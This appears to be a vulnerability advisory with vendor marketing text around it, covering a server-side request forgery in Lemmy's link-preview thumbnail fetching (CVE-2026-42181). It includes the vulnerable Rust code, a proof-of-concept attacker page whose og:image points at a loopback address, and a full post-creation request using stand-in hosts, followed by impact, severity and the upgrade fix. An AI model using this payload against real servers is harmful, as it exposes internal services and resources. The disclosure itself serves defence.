Summary
Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction.
As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users.
Details
The metadata fetch logic applies an internal-address check only to the initial post URL. After HTML parsing, extract_opengraph_data() accepts absolute og:image values and returns them as-is. Later, generate_post_link_metadata() passes that second-hop image URL into generate_pictrs_thumbnail(), which instructs local pict-rs to fetch it through image/download?url=....
This creates a two-stage source-to-sink chain where the first URL is constrained, but the security boundary is bypassed through an unvalidated secondary resource.
Core vulnerable code path:
// crates/api_common/src/request.rs
let metadata = match &post.url {
Some(url) => fetch_link_metadata(url, &context, false).await.unwrap_or_default(),
_ => Default::default(),
};
// crates/api_common/src/request.rs
let og_image = page
.opengraph
.images
.first()
.and_then(|ogo| url.join(&ogo.url).ok());
// crates/api_common/src/request.rs
let thumbnail_url = if let (true, Some(url)) = (allow_generate_thumbnail, image_url.clone()) {
generate_pictrs_thumbnail(&url, &context).await.ok().map(Into::into).or(image_url)
} else {
image_url.clone()
};
// crates/api_common/src/request.rs
let fetch_url = format!(
"{}image/download?url={}&resize={}",
pictrs_config.url,
encode(image_url.as_str()),
context.settings().pictrs_config()?.max_thumbnail_size
);
These snippets show that only the outer page URL is checked, while the extracted og:image value becomes a server-side fetch target without an equivalent internal-address guard.
PoC
Prerequisites:
- The attacker has a valid low-privileged account.
- The instance uses the default link preview storage mode.
- The attacker can post a link to a community they can access.
Practical reproduction flow:
- Host a public HTML page under attacker control.
- Add an Open Graph image tag whose value points to an internal image URL reachable from the Lemmy host, such as
http://127.0.0.1:8081/internal.png. - Create a Lemmy post whose
urlis the attacker-controlled page. - Observe Lemmy fetch the public page, extract
og:image, and then fetch the internal image through pict-rs. - Observe the created post receive a local thumbnail URL, demonstrating that the internal image was retrieved and cached.
Complete PoC attacker page:
<html><head>
<meta property="og:image" content="http://127.0.0.1:8081/internal.png">
</head><body>x</body></html>
Complete PoC request:
POST /api/v3/post HTTP/1.1
Host: victim.example
Authorization: Bearer <low-priv-jwt>
Content-Type: application/json
{
"name": "thumb-ssrf",
"community_id": 1,
"url": "https://attacker.example/og.html",
"body": null,
"alt_text": null,
"honeypot": null,
"nsfw": false,
"language_id": null,
"custom_thumbnail": null
}
Outcome:
- The post creation request succeeds.
- The internal image endpoint receives a request from the Lemmy server.
- The created post is updated with a local
thumbnail_url, indicating that the internal image was fetched and cached.
Impact
This issue upgrades an attacker-controlled external page into an internal image fetch primitive. It can be used to retrieve internal image resources, expose content that is otherwise reachable only from the application host, and publish those internal resources through Lemmy's own thumbnail serving path.
Because the vulnerable mode is the documented default behavior for link previews, the issue is relevant even without non-default privacy settings.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2026-42181 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.19.18); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-42181? CVE-2026-42181 is a medium-severity server-side request forgery (SSRF) vulnerability in lemmy_api_common (rust), affecting versions < 0.19.18. It is fixed in 0.19.18. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
- How severe is CVE-2026-42181? CVE-2026-42181 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of lemmy_api_common are affected by CVE-2026-42181? lemmy_api_common (rust) versions < 0.19.18 is affected.
- Is there a fix for CVE-2026-42181? Yes. CVE-2026-42181 is fixed in 0.19.18. Upgrade to this version or later.
- Is CVE-2026-42181 exploitable, and should I be worried? Whether CVE-2026-42181 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-42181 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-42181? Upgrade
lemmy_api_commonto 0.19.18 or later.